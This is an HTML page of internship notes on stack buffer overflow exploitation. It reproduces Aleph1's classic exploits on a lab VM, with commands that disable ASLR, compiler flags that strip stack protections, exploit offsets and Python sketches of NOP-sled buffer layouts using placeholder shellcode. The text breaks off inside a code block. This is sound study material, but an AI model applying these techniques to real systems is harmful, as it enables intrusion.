<!DOCTYPE html>
<!--
==============================================================================
           "GitHub HTML5 Pandoc Template" v2.1 — by Tristano Ajmone           
==============================================================================
Copyright © Tristano Ajmone, 2017, MIT License (MIT). Project's home:

- https://github.com/tajmone/pandoc-goodies

The CSS in this template reuses source code taken from the following projects:

- GitHub Markdown CSS: Copyright © Sindre Sorhus, MIT License (MIT):
  https://github.com/sindresorhus/github-markdown-css

- Primer CSS: Copyright © 2016-2017 GitHub Inc., MIT License (MIT):
  http://primercss.io/

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
The MIT License 

Copyright (c) Tristano Ajmone, 2017 (github.com/tajmone/pandoc-goodies)
Copyright (c) Sindre Sorhus <sindresorhus@gmail.com> (sindresorhus.com)
Copyright (c) 2017 GitHub Inc.

"GitHub Pandoc HTML5 Template" is Copyright (c) Tristano Ajmone, 2017, released
under the MIT License (MIT); it contains readaptations of substantial portions
of the following third party softwares:

(1) "GitHub Markdown CSS", Copyright (c) Sindre Sorhus, MIT License (MIT).
(2) "Primer CSS", Copyright (c) 2016 GitHub Inc., MIT License (MIT).

Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:

The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.

THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
==============================================================================-->
<html>
<head>
  <meta charset="utf-8" />
  <meta name="generator" content="pandoc" />
  <meta name="viewport" content="width=device-width, initial-scale=1.0, user-scalable=yes" />
  <meta name="author" content="Florian Hofhammer" />
  <meta name="dcterms.date" content="2020-05-14" />
  <title>Notes for the Stack Buffer Overflow internship at INRIA Sophia</title>
  <style type="text/css">
@charset "UTF-8";.markdown-body{text-align:justify;-ms-text-size-adjust:100%;-webkit-text-size-adjust:100%;color:#24292e;font-family:-apple-system,system-ui,BlinkMacSystemFont,"Segoe UI",Helvetica,Arial,sans-serif,"Apple Color Emoji","Segoe UI Emoji","Segoe UI Symbol";font-size:16px;line-height:1.5;word-wrap:break-word;box-sizing:border-box;min-width:200px;max-width:980px;margin:0 auto;padding:45px}.markdown-body a{color:#0366d6;background-color:transparent;text-decoration:none;-webkit-text-decoration-skip:objects}.markdown-body a:active,.markdown-body a:hover{outline-width:0}.markdown-body a:hover{text-decoration:underline}.markdown-body a:not([href]){color:inherit;text-decoration:none}.markdown-body strong{font-weight:600}.markdown-body h1,.markdown-body h2,.markdown-body h3,.markdown-body h4,.markdown-body h5,.markdown-body h6{margin-top:24px;margin-bottom:16px;font-weight:600;line-height:1.25}.markdown-body h1{font-size:2em;margin:.67em 0;padding-bottom:.3em;border-bottom:1px solid #eaecef}.markdown-body h2{padding-bottom:.3em;font-size:1.5em;border-bottom:1px solid #eaecef}.markdown-body h3{font-size:1.25em}.markdown-body h4{font-size:1em}.markdown-body h5{font-size:.875em}.markdown-body h6{font-size:.85em;color:#6a737d}.markdown-body img{border-style:none}.markdown-body svg:not(:root){overflow:hidden}.markdown-body hr{box-sizing:content-box;height:.25em;margin:24px 0;padding:0;overflow:hidden;background-color:#e1e4e8;border:0}.markdown-body hr::before{display:table;content:""}.markdown-body hr::after{display:table;clear:both;content:""}.markdown-body input{margin:0;overflow:visible;font:inherit;font-family:inherit;font-size:inherit;line-height:inherit}.markdown-body [type=checkbox]{box-sizing:border-box;padding:0}.markdown-body *{box-sizing:border-box}.markdown-body blockquote{margin:0}.markdown-body ol,.markdown-body ul{padding-left:2em}.markdown-body ol ol,.markdown-body ul ol{list-style-type:lower-roman}.markdown-body ol ol,.markdown-body ol 
ul,.markdown-body ul ol,.markdown-body ul ul{margin-top:0;margin-bottom:0}.markdown-body ol ol ol,.markdown-body ol ul ol,.markdown-body ul ol ol,.markdown-body ul ul ol{list-style-type:lower-alpha}.markdown-body li>p{margin-top:16px}.markdown-body li+li{margin-top:.25em}.markdown-body dd{margin-left:0}.markdown-body dl{padding:0}.markdown-body dl dt{padding:0;margin-top:16px;font-size:1em;font-style:italic;font-weight:600}.markdown-body dl dd{padding:0 16px;margin-bottom:16px}.markdown-body code{font-family:SFMono-Regular,Consolas,"Liberation Mono",Menlo,Courier,monospace}.markdown-body pre{font:12px SFMono-Regular,Consolas,"Liberation Mono",Menlo,Courier,monospace;word-wrap:normal}.markdown-body blockquote,.markdown-body dl,.markdown-body ol,.markdown-body p,.markdown-body pre,.markdown-body table,.markdown-body ul{margin-top:0;margin-bottom:16px}.markdown-body blockquote{padding:0 1em;color:#6a737d;border-left:.25em solid #dfe2e5}.markdown-body blockquote>:first-child{margin-top:0}.markdown-body blockquote>:last-child{margin-bottom:0}.markdown-body table{display:block;width:100%;overflow:auto;border-spacing:0;border-collapse:collapse}.markdown-body table th{font-weight:600}.markdown-body table td,.markdown-body table th{padding:6px 13px;border:1px solid #dfe2e5}.markdown-body table tr{background-color:#fff;border-top:1px solid #c6cbd1}.markdown-body table tr:nth-child(2n){background-color:#f6f8fa}.markdown-body img{max-width:100%;box-sizing:content-box;background-color:#fff}.markdown-body code{padding:.2em 0;margin:0;font-size:85%;background-color:rgba(27,31,35,.05);border-radius:3px}.markdown-body code::after,.markdown-body code::before{letter-spacing:-.2em;content:" "}.markdown-body pre>code{padding:0;margin:0;font-size:100%;word-break:normal;white-space:pre;background:0 0;border:0}.markdown-body .highlight{margin-bottom:16px}.markdown-body .highlight pre{margin-bottom:0;word-break:normal}.markdown-body .highlight pre,.markdown-body 
pre{padding:16px;overflow:auto;font-size:85%;line-height:1.45;background-color:#f6f8fa;border-radius:3px}.markdown-body pre code{display:inline;max-width:auto;padding:0;margin:0;overflow:visible;line-height:inherit;word-wrap:normal;background-color:transparent;border:0}.markdown-body pre code::after,.markdown-body pre code::before{content:normal}.markdown-body .full-commit .btn-outline:not(:disabled):hover{color:#005cc5;border-color:#005cc5}.markdown-body kbd{box-shadow:inset 0 -1px 0 #959da5;display:inline-block;padding:3px 5px;font:11px/10px SFMono-Regular,Consolas,"Liberation Mono",Menlo,Courier,monospace;color:#444d56;vertical-align:middle;background-color:#fcfcfc;border:1px solid #c6cbd1;border-bottom-color:#959da5;border-radius:3px;box-shadow:inset 0 -1px 0 #959da5}.markdown-body :checked+.radio-label{position:relative;z-index:1;border-color:#0366d6}.markdown-body .task-list-item{list-style-type:none}.markdown-body .task-list-item+.task-list-item{margin-top:3px}.markdown-body .task-list-item input{margin:0 .2em .25em -1.6em;vertical-align:middle}.markdown-body::before{display:table;content:""}.markdown-body::after{display:table;clear:both;content:""}.markdown-body>:first-child{margin-top:0!important}.markdown-body>:last-child{margin-bottom:0!important}.Alert,.Error,.Note,.Success,.Warning{padding:11px;margin-bottom:24px;border-style:solid;border-width:1px;border-radius:4px}.Alert p,.Error p,.Note p,.Success p,.Warning p{margin-top:0}.Alert p:last-child,.Error p:last-child,.Note p:last-child,.Success p:last-child,.Warning p:last-child{margin-bottom:0}.Alert{color:#246;background-color:#e2eef9;border-color:#bac6d3}.Warning{color:#4c4a42;background-color:#fff9ea;border-color:#dfd8c2}.Error{color:#911;background-color:#fcdede;border-color:#d2b2b2}.Success{color:#22662c;background-color:#e2f9e5;border-color:#bad3be}.Note{color:#2f363d;background-color:#f6f8fa;border-color:#d5d8da}.Alert h1,.Alert h2,.Alert h3,.Alert h4,.Alert h5,.Alert 
h6{color:#246;margin-bottom:0}.Warning h1,.Warning h2,.Warning h3,.Warning h4,.Warning h5,.Warning h6{color:#4c4a42;margin-bottom:0}.Error h1,.Error h2,.Error h3,.Error h4,.Error h5,.Error h6{color:#911;margin-bottom:0}.Success h1,.Success h2,.Success h3,.Success h4,.Success h5,.Success h6{color:#22662c;margin-bottom:0}.Note h1,.Note h2,.Note h3,.Note h4,.Note h5,.Note h6{color:#2f363d;margin-bottom:0}.Alert h1:first-child,.Alert h2:first-child,.Alert h3:first-child,.Alert h4:first-child,.Alert h5:first-child,.Alert h6:first-child,.Error h1:first-child,.Error h2:first-child,.Error h3:first-child,.Error h4:first-child,.Error h5:first-child,.Error h6:first-child,.Note h1:first-child,.Note h2:first-child,.Note h3:first-child,.Note h4:first-child,.Note h5:first-child,.Note h6:first-child,.Success h1:first-child,.Success h2:first-child,.Success h3:first-child,.Success h4:first-child,.Success h5:first-child,.Success h6:first-child,.Warning h1:first-child,.Warning h2:first-child,.Warning h3:first-child,.Warning h4:first-child,.Warning h5:first-child,.Warning h6:first-child{margin-top:0}h1.title,p.subtitle{text-align:center}h1.title.followed-by-subtitle{margin-bottom:0}p.subtitle{font-size:1.5em;font-weight:600;line-height:1.25;margin-top:0;margin-bottom:16px;padding-bottom:.3em}div.line-block{white-space:pre-line}
  </style>
  <style type="text/css">code{white-space: break-spaces; word-break: keep-all;}</style>
  <style type="text/css">
a.sourceLine { display: inline-block; line-height: 1.25; }
a.sourceLine { pointer-events: none; color: inherit; text-decoration: inherit; }
a.sourceLine:empty { height: 1.2em; }
.sourceCode { overflow: visible; }
code.sourceCode { white-space: pre; position: relative; }
div.sourceCode { margin: 1em 0; }
pre.sourceCode { margin: 0; }
@media screen {
div.sourceCode { overflow: auto; }
}
@media print {
code.sourceCode { white-space: pre-wrap; }
a.sourceLine { text-indent: -1em; padding-left: 1em; }
}
pre.numberSource a.sourceLine
  { position: relative; left: -4em; }
pre.numberSource a.sourceLine::before
  { content: attr(data-line-number);
    position: relative; left: -1em; text-align: right; vertical-align: baseline;
    border: none; pointer-events: all; display: inline-block;
    -webkit-touch-callout: none; -webkit-user-select: none;
    -khtml-user-select: none; -moz-user-select: none;
    -ms-user-select: none; user-select: none;
    padding: 0 4px; width: 4em;
    color: #aaaaaa;
  }
pre.numberSource { margin-left: 3em; border-left: 1px solid #aaaaaa;  padding-left: 4px; }
div.sourceCode
  {  }
@media screen {
a.sourceLine::before { text-decoration: underline; }
}
code span.al { color: #ff0000; font-weight: bold; } /* Alert */
code span.an { color: #60a0b0; font-weight: bold; font-style: italic; } /* Annotation */
code span.at { color: #7d9029; } /* Attribute */
code span.bn { color: #40a070; } /* BaseN */
code span.bu { } /* BuiltIn */
code span.cf { color: #007020; font-weight: bold; } /* ControlFlow */
code span.ch { color: #4070a0; } /* Char */
code span.cn { color: #880000; } /* Constant */
code span.co { color: #60a0b0; font-style: italic; } /* Comment */
code span.cv { color: #60a0b0; font-weight: bold; font-style: italic; } /* CommentVar */
code span.do { color: #ba2121; font-style: italic; } /* Documentation */
code span.dt { color: #902000; } /* DataType */
code span.dv { color: #40a070; } /* DecVal */
code span.er { color: #ff0000; font-weight: bold; } /* Error */
code span.ex { } /* Extension */
code span.fl { color: #40a070; } /* Float */
code span.fu { color: #06287e; } /* Function */
code span.im { } /* Import */
code span.in { color: #60a0b0; font-weight: bold; font-style: italic; } /* Information */
code span.kw { color: #007020; font-weight: bold; } /* Keyword */
code span.op { color: #666666; } /* Operator */
code span.ot { color: #007020; } /* Other */
code span.pp { color: #bc7a00; } /* Preprocessor */
code span.sc { color: #4070a0; } /* SpecialChar */
code span.ss { color: #bb6688; } /* SpecialString */
code span.st { color: #4070a0; } /* String */
code span.va { color: #19177c; } /* Variable */
code span.vs { color: #4070a0; } /* VerbatimString */
code span.wa { color: #60a0b0; font-weight: bold; font-style: italic; } /* Warning */
  </style>
  <!--[if lt IE 9]>
    <script src="//cdnjs.cloudflare.com/ajax/libs/html5shiv/3.7.3/html5shiv-printshiv.min.js"></script>
  <![endif]-->
</head>
<body>
<article class="markdown-body">
<header>
<h1 class="title">Notes for the Stack Buffer Overflow internship at INRIA Sophia</h1>
<p class="author">Florian Hofhammer</p>
<p class="date">2020-05-14</p>
</header>
<hr>
<nav id="TOC">
<h1 class="toc-title">Contents</h1>
<ul>
<li><a href="#virtual-machine-setup">Virtual Machine setup</a><ul>
<li><a href="#basic-information">Basic information</a></li>
<li><a href="#necessary-configuration">Necessary configuration</a></li>
<li><a href="#optional-configuration">Optional configuration</a></li>
</ul></li>
<li><a href="#smashing-the-stack-for-fun-and-profit---aleph1">Smashing the Stack for fun and profit - Aleph1</a><ul>
<li><a href="#example3.c">example3.c</a></li>
<li><a href="#overflow1.c">overflow1.c</a></li>
<li><a href="#vulnerable.c">vulnerable.c</a></li>
<li><a href="#optimizing-compilation">Optimizing compilation</a></li>
</ul></li>
<li><a href="#bit-linux-stack-smashing">64-bit Linux stack smashing</a><ul>
<li><a href="#part-1">Part 1</a></li>
<li><a href="#part-2">Part 2</a></li>
<li><a href="#part-3">Part 3</a></li>
<li><a href="#optimizing-compilation-1">Optimizing compilation</a></li>
</ul></li>
<li><a href="#aslr-smack-and-laugh">ASLR Smack and Laugh</a><ul>
<li><a href="#general-observations">General observations</a></li>
<li><a href="#aggression">Aggression</a></li>
<li><a href="#return-into-non-randomized-memory">Return into non-randomized memory</a></li>
<li><a href="#pointer-redirecting">Pointer redirecting</a></li>
<li><a href="#integer-overflows">Integer overflows</a></li>
<li><a href="#stack-divulging-methods">Stack divulging methods</a></li>
<li><a href="#stack-juggling-methods">Stack juggling methods</a></li>
<li><a href="#got-hijacking---ret2got">GOT hijacking - ret2got</a></li>
<li><a href="#off-by-one">Off by one</a></li>
<li><a href="#overwriting-.dtors">Overwriting .dtors</a></li>
<li><a href="#optimizing-compilation-2">Optimizing compilation</a></li>
</ul></li>
<li><a href="#stack-canary-bypassing">Stack canary bypassing</a><ul>
<li><a href="#stack-analysis---getcanary-and-getcanarythreaded">Stack analysis - <code>getCanary</code> and <code>getCanaryThreaded</code></a></li>
<li><a href="#brute-force-leaking">Brute force leaking</a></li>
<li><a href="#extended-brute-force-leaking">Extended brute force leaking</a></li>
<li><a href="#optimizing-compilation-3">Optimizing compilation</a></li>
</ul></li>
</ul>
</nav>
<hr>
<h1 id="virtual-machine-setup">Virtual Machine setup</h1>
<h2 id="basic-information">Basic information</h2>
<p>The virtual machine used for the experiments is based on the Ubuntu 20.04 Desktop distribution with Linux kernel 5.4.0, GLIBC 2.31 and GCC 9.3.0 and runs in VirtualBox 6.1. Updates are installed regularly to keep the system up to date.<br />
ASLR is enabled or disabled on a case-by-case basis, as some of the exploits require ASLR to be turned off. Since ASLR is enabled by default in modern Linux kernels, it has to be disabled manually where necessary. It can be turned off with the command <code>echo 0 | sudo tee /proc/sys/kernel/randomize_va_space</code> and turned back on with <code>echo 2 | sudo tee /proc/sys/kernel/randomize_va_space</code>.<br />
Support for compiling 32 bit executables was added by running</p>
<div class="sourceCode" id="cb1"><pre class="sourceCode bash"><code class="sourceCode bash"><a class="sourceLine" id="cb1-1" data-line-number="1">    <span class="fu">sudo</span> dpkg --add-architecture i386 <span class="co"># 32 bit packages</span></a>
<a class="sourceLine" id="cb1-2" data-line-number="2">    <span class="fu">sudo</span> apt-get update</a>
<a class="sourceLine" id="cb1-3" data-line-number="3">    <span class="fu">sudo</span> apt-get install libc6:i386 libncurses5:i386 libstdc++6:i386 \</a>
<a class="sourceLine" id="cb1-4" data-line-number="4">         g++-multilib build-essential gdb <span class="co"># install 32 bit libraries and development tools</span></a></code></pre></div>
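<p>Before running an exploit, it can be useful to confirm which ASLR mode is currently active. The following is a minimal Python sketch that reads the <code>randomize_va_space</code> setting mentioned above; the helper names <code>describe_aslr</code> and <code>current_aslr_mode</code> are hypothetical and not part of the internship code.</p>
<div class="sourceCode"><pre class="sourceCode python"><code class="sourceCode python">from pathlib import Path

ASLR_FILE = Path("/proc/sys/kernel/randomize_va_space")

# Meaning of the values as documented for the Linux kernel sysctl.
ASLR_MODES = {
    0: "disabled",
    1: "stack, mmap base and VDSO randomized",
    2: "additionally randomizes the heap (brk)",
}


def describe_aslr(value):
    """Translate a randomize_va_space value into a readable description."""
    return ASLR_MODES.get(value, "unknown value")


def current_aslr_mode(path=ASLR_FILE):
    """Return the current setting, or None if the file cannot be read (e.g. not on Linux)."""
    try:
        return int(path.read_text().strip())
    except (OSError, ValueError):
        return None


if __name__ == "__main__":
    mode = current_aslr_mode()
    print(mode, describe_aslr(mode))
</code></pre></div>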
<p>The machine the VM runs on is based on an Intel Core i5 6300HQ processor, which does <strong>not</strong> support Intel CET (Control-flow Enforcement Technology). On newer Intel processors that do support it (i.e. Tiger Lake (11th Gen Intel Core) or later according to a <a href="https://windows-internals.com/cet-on-windows/">windows-internals.com blog post</a>), this feature might cause the described exploits to fail. In order to disable this feature in the executables, add the <code>-fcf-protection=none</code> compiler flag.<br />
As the compiler output differs depending on whether this flag is present, the addresses used in the exploits might need to be adapted.</p>
<p>The whole development process is conducted on the host machine of the VM, and the VM accesses the files via a shared directory. The executables are compiled and run in an SSH shell. Thus, if exploits are developed and executed directly in the VM, the shell’s environment may differ and adaptations might be necessary. However, this remote development approach is not a prerequisite for the steps described in the following sections. It is just a personal preference (see also section <a href="#optional-configuration">optional configuration</a>).</p>
<h2 id="necessary-configuration">Necessary configuration</h2>
<p>Some of the exploits (e.g. for the <a href="#bit-linux-stack-smashing">64 bit stack smashing tutorial</a> or the <a href="#stack-canary-bypassing">stack canary bypass</a>) were conducted using Python code based on the <code>pwntools</code> library. This library can be installed by invoking <code>pip3 install pwntools</code>. Dependencies should be installed automatically. If they are not, they have to be installed manually.</p>
<h2 id="optional-configuration">Optional configuration</h2>
<p>In order to ease debugging, I installed <code>peda</code>, <code>pwndbg</code> and <code>gef</code> using an install script from a <a href="https://github.com/apogiatzis/gdb-peda-pwndbg-gef">GitHub repository</a>. All three are extensions to the GDB debugger which improve the interface and provide additional commands that ease debugging greatly.<br />
As they are based on the GDB Python API and partly still use Python 2.7 (which by default is not included in current Ubuntu releases), it may be necessary to install the <code>python2-dev</code> package via <code>sudo apt install python2-dev</code>. If dependencies for the GDB extensions are missing, they also have to be installed via <code>pip</code>, e.g. <code>python2 -m pip install setuptools</code> to install the Python setup tools for Python 2.7.</p>
<p>Regarding Python, the package <code>python-is-python3</code> (installed via <code>sudo apt install python-is-python3</code>) makes <code>python</code> an alias for <code>python3</code>. This is merely a convenience if the personal workflow involves calling <code>python</code> instead of specifying the Python version.</p>
<p>I also mounted the directory containing the internship data and files into the virtual machine and installed the OpenSSH Server (<code>sudo apt install openssh-server</code>) to be able to <code>ssh</code> into the virtual machine and execute all the code whilst not having to make any changes to the host machine. It is, however, important to point out that if accessing a shell via <code>ssh</code> in the VM, the stack addresses may differ from those when directly opening a terminal in the VM, as the <code>ssh</code> session adds additional information to the environment by setting environment variables which might lead to different offsets on the stack.</p>
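<p>The effect of the additional <code>ssh</code> environment variables can be estimated with a short calculation. The following Python sketch only counts the bytes of the <code>NAME=value</code> strings; the variable values are made-up examples, the function name <code>env_block_size</code> is hypothetical, and alignment padding as well as the pointer array for the environment are ignored.</p>
<div class="sourceCode"><pre class="sourceCode python"><code class="sourceCode python">def env_block_size(env):
    """Bytes occupied by the NAME=value strings, each with a terminating NUL byte."""
    return sum(len(name) + 1 + len(value) + 1 for name, value in env.items())


# Hypothetical environments: a local terminal and the same shell reached via ssh.
local_env = {"HOME": "/home/user", "PATH": "/usr/bin:/bin"}
ssh_env = dict(
    local_env,
    SSH_CONNECTION="10.0.2.2 50000 10.0.2.15 22",
    SSH_TTY="/dev/pts/0",
)

# Every extra byte moves the data placed on the stack after it to another address.
shift = env_block_size(ssh_env) - env_block_size(local_env)

if __name__ == "__main__":
    print("extra bytes contributed by the ssh variables:", shift)
</code></pre></div>
<p>Even a shift of a few bytes matters for exploits that hard-code stack addresses, which is why offsets determined in one kind of session may not work in the other.</p>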
<p>Additionally, I installed the disassembler and debugger <code>radare2</code> from <a href="https://github.com/radareorg/radare2">GitHub</a> for easy disassembly analysis. Installation was conducted by calling <code>git clone https://github.com/radareorg/radare2.git &amp;&amp; ./radare2/sys/install.sh</code>.</p>
<p>Other useful installed tools include <code>ropper</code> and <code>ROPgadget</code> which make it easier to find gadgets for return-oriented programming (ROP). Those were installed with <code>pip3 install ropper ropgadget</code>. For further information, see the GitHub repositories for <a href="https://github.com/sashs/Ropper">ropper</a> and <a href="https://github.com/JonathanSalwan/ROPgadget">ROPgadget</a>.</p>
<p>All of those tools and installation steps are fully optional; the exploits work just fine without them. However, they can greatly reduce the time needed to find bugs and improve the exploit development process.</p>
<h1 id="smashing-the-stack-for-fun-and-profit---aleph1">Smashing the Stack for fun and profit - Aleph1</h1>
<p>As a starting exercise, I am trying to recreate the examples and exploits from the <a href="http://phrack.org/issues/49/14.html#article">original paper</a>. The compiler / linker flags for <code>gcc</code> generally used are <code>-m32 -fno-stack-protector -U_FORTIFY_SOURCE -D_FORTIFY_SOURCE=0 -g -z execstack</code> (see e.g. the <a href="./Makefile.common">common Makefile</a> and the <a href="./Smashing%20the%20stack%20-%20Aleph1/Makefile">directory specific Makefile</a>). ASLR is turned off for this section. Without these settings, current stack overflow mitigations prevent the stack buffer overflows from succeeding as described in the paper.</p>
<h2 id="example3.c">example3.c</h2>
<p>The executable only yielded a segfault because the return address was incorrectly overwritten (checked with <code>gdb</code>). In order to correctly overwrite the return address, the offset relative to <code>buffer1</code> has to be changed from <code>12</code> to <code>13</code>, as the original value is off by one byte.</p>
<h2 id="overflow1.c">overflow1.c</h2>
<p>At the end of the <code>main</code> function, <code>gcc</code> produced the following assembly code:</p>
<div class="sourceCode" id="cb2"><pre class="sourceCode asm"><code class="sourceCode fasm"><a class="sourceLine" id="cb2-1" data-line-number="1"><span class="bu">nop</span></a>
<a class="sourceLine" id="cb2-2" data-line-number="2"><span class="bu">lea</span>    <span class="bn">-0x8</span>(%<span class="kw">ebp</span>),%<span class="kw">esp</span></a>
<a class="sourceLine" id="cb2-3" data-line-number="3"><span class="bu">pop</span>    %<span class="kw">ecx</span></a>
<a class="sourceLine" id="cb2-4" data-line-number="4"><span class="bu">pop</span>    %<span class="kw">ebx</span></a>
<a class="sourceLine" id="cb2-5" data-line-number="5"><span class="bu">pop</span>    %<span class="kw">ebp</span></a>
<a class="sourceLine" id="cb2-6" data-line-number="6"><span class="bu">lea</span>    <span class="bn">-0x4</span>(%<span class="kw">ecx</span>),%<span class="kw">esp</span></a>
<a class="sourceLine" id="cb2-7" data-line-number="7"><span class="bu">ret</span></a></code></pre></div>
<p>The problem here is that a value is popped from the stack into <code>ecx</code> and an offset from that value is used as the new <code>esp</code>. As we overwrite the stack with the buffer address, <code>esp</code> then points before the buffer instead of on the stack where the buffer address resides. Thus, the <code>ret</code> instruction fetches the wrong address and the exploit doesn’t work.</p>
<p>After having a lot of problems with this issue, I found a comment online suggesting to add the <code>-mpreferred-stack-boundary=2</code> compiler flag, which instructs <code>gcc</code> to keep the stack aligned to 4 bytes (2^2) instead of the default of 16 bytes (2^4). With 4-byte alignment, <code>main</code> no longer needs to realign the stack and therefore no longer restores <code>esp</code> via <code>ecx</code>. <strong>This additional flag is used throughout all of the following examples if compiled in 32 bit mode!</strong> With this change, the same part of the assembly code was generated as follows:</p>
<div class="sourceCode" id="cb3"><pre class="sourceCode asm"><code class="sourceCode fasm"><a class="sourceLine" id="cb3-1" data-line-number="1"><span class="bu">nop</span></a>
<a class="sourceLine" id="cb3-2" data-line-number="2"><span class="bu">mov</span>    <span class="bn">-0x4</span>(%<span class="kw">ebp</span>),%<span class="kw">ebx</span></a>
<a class="sourceLine" id="cb3-3" data-line-number="3"><span class="bu">leave</span></a>
<a class="sourceLine" id="cb3-4" data-line-number="4"><span class="bu">ret</span></a></code></pre></div>
<p><code>leave</code> destroys a stack frame and thus restores the stack pointer from <code>ebp</code>. Thus, <code>esp</code> has the correct value after <code>leave</code> and the first value on the stack is the address of the buffer. Therefore, <code>ret</code> jumps to the buffer address and thus to our shellcode.</p>
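<p>The difference between the two epilogues can be reproduced with a toy model of the stack. The following Python sketch is a simplification under stated assumptions: the addresses <code>BUFFER</code> and <code>EBP</code> are made up, memory is modelled as a dictionary of 4-byte slots, the overflow is assumed to write the buffer address into every slot from the buffer up to the return address, and the shellcode bytes at the start of the buffer are not modelled.</p>
<div class="sourceCode"><pre class="sourceCode python"><code class="sourceCode python">WORD = 4  # size of one 32-bit stack slot in bytes


def ret_target_realigned(memory, ebp):
    """Epilogue 1: lea -0x8(%ebp),%esp; pop ecx/ebx/ebp; lea -0x4(%ecx),%esp; ret."""
    esp = ebp - 8           # lea -0x8(%ebp),%esp
    ecx = memory[esp]       # pop %ecx (this slot was overwritten by the overflow)
    esp += WORD
    esp += WORD             # pop %ebx (value irrelevant here)
    esp += WORD             # pop %ebp (value irrelevant here)
    esp = ecx - 4           # lea -0x4(%ecx),%esp
    return memory.get(esp)  # ret fetches whatever is stored at the new esp


def ret_target_leave(memory, ebp):
    """Epilogue 2: mov -0x4(%ebp),%ebx; leave; ret."""
    esp = ebp               # leave, first half: mov %ebp,%esp
    esp += WORD             # leave, second half: pop %ebp
    return memory.get(esp)  # ret fetches the saved return address slot


# Hypothetical addresses, chosen only for illustration.
BUFFER = 0xFFFFD000
EBP = 0xFFFFD080

# The overflow writes the buffer address into every slot up to the return address.
memory = {addr: BUFFER for addr in range(BUFFER, EBP + 2 * WORD, WORD)}

if __name__ == "__main__":
    print("realigning epilogue returns to:", ret_target_realigned(memory, EBP))
    print("leave epilogue returns to:", hex(ret_target_leave(memory, EBP)))
</code></pre></div>
<p>In this model, the first epilogue ends up reading the slot just below the buffer, which the overflow never touched, whereas the second one reads the overwritten return address slot.</p>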
<h2 id="vulnerable.c">vulnerable.c</h2>
<p>For this executable, the input to overflow the buffer correctly is provided by <code>exploit2</code>, <code>exploit3</code>, <code>exploit4</code> or <code>eggshell</code>. All of those executables can of course also be used for other vulnerable programs, not only for the example program given here.</p>
<h3 id="exploit2">exploit2</h3>
<p>This executable is compiled from <code>exploit2.c</code>. It takes two arguments: a buffer size and an offset. The buffer size tells the executable how many bytes should be filled with the shellcode and padded with the stack address and the offset manipulates the stack address to be written into the buffer.</p>
<p>This approach requires providing exactly the correct buffer address, so that the return address is overwritten with the address of the first byte of the shellcode. This implies that being off by only a single byte probably causes the program to crash instead of spawning a shell.</p>
<p>With modern compilers (see <a href="#basic-information">Virtual machine basic information</a>), the stack offset differs from the one given in Aleph1’s original paper: instead of calling <code>exploit2 600 1564</code> for a buffer size of 600 bytes filled with shellcode and stack address as well as an offset of 1564 bytes from the base stack address, it is necessary to call <code>exploit2 600 1660</code>, which uses the same buffer size but a different offset.</p>
<p>The problem is that the offset 1660 might differ from machine to machine and from run to run, as it heavily depends on the stack contents. Thus, different environment variables (e.g. a different path, a different working directory, a different username) can heavily influence the necessary offsets, as they change the amount of data on the stack and thus the stack layout. It is therefore advisable to determine the right address with the help of a debugger or to continue with the other exploits, as it is difficult to hit exactly the one single address that points to the shellcode.</p>
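<p>The buffer layout used by <code>exploit2</code> can be sketched in a few lines of Python. This is an illustration under assumptions, not the code from the paper: the shellcode is replaced by placeholder bytes, the stack pointer value is made up, the <code>EGG=</code> environment prefix is omitted, and the guessed address is assumed to be computed as stack pointer minus offset.</p>
<div class="sourceCode"><pre class="sourceCode python"><code class="sourceCode python">SHELLCODE = b"\xcc" * 45  # placeholder bytes standing in for the real shellcode


def build_exploit2_buffer(bsize, stack_pointer, offset, shellcode=SHELLCODE):
    """Fill bsize bytes with the guessed address, then put the shellcode at the start."""
    addr = (stack_pointer - offset) % 2**32   # guessed address of the buffer start
    word = addr.to_bytes(4, "little")         # x86 stores integers little-endian
    buf = bytearray(word * (bsize // 4))      # the address repeated over the buffer
    buf[:len(shellcode)] = shellcode          # shellcode overwrites the first bytes
    return addr, bytes(buf)


if __name__ == "__main__":
    # 0xFFFFD600 is a hypothetical stack pointer value.
    addr, buf = build_exploit2_buffer(600, 0xFFFFD600, 1660)
    print(hex(addr), len(buf))
</code></pre></div>
<p>Since the shellcode starts at the very first byte of the buffer, only one value of the guessed address leads to its execution, which is why the offset has to be exact.</p>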
<h3 id="exploit3">exploit3</h3>
<p><code>exploit3</code> works exactly the same way as <code>exploit2</code> but instead of just writing the shellcode to the buffer, it fills half of the buffer with <code>NOP</code> instructions (<code>0x90</code> on x86) before writing the shellcode to the buffer.</p>
<p>This makes it easier to execute the shellcode, as it is not necessary to exactly hit the buffer address where the shellcode resides when overwriting the return address. It now is completely sufficient to overwrite the return address with an arbitrary address pointing into the first half of the buffer which gives us a certain degree of freedom and error resilience.</p>
<p>However, it is again not possible to just issue the call provided in the original paper (<code>exploit3 600</code>). When debugging the <code>vulnerable</code> executable, it is easy to see that the return address in fact points into the buffer but only at a part of the buffer where the stack address resides (i.e. to a part of the buffer after the NOP sled and the shellcode). Because of the NOP sled in front of the shellcode, it is then pretty easy to find an offset that reliably lets the program return onto the stack where our shellcode resides (e.g. <code>exploit3 600 350</code> or <code>exploit3 600 400</code>).</p>
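<p>The tolerance gained by the NOP sled can be illustrated with a simplified Python model. The layout below (NOPs in the first half, placeholder shellcode directly after them, the guessed address in the rest) is an approximation of what <code>exploit3</code> produces, and all names and addresses are hypothetical.</p>
<div class="sourceCode"><pre class="sourceCode python"><code class="sourceCode python">NOP = 0x90                # single-byte NOP instruction on x86
SHELLCODE = b"\xcc" * 45  # placeholder bytes standing in for the real shellcode


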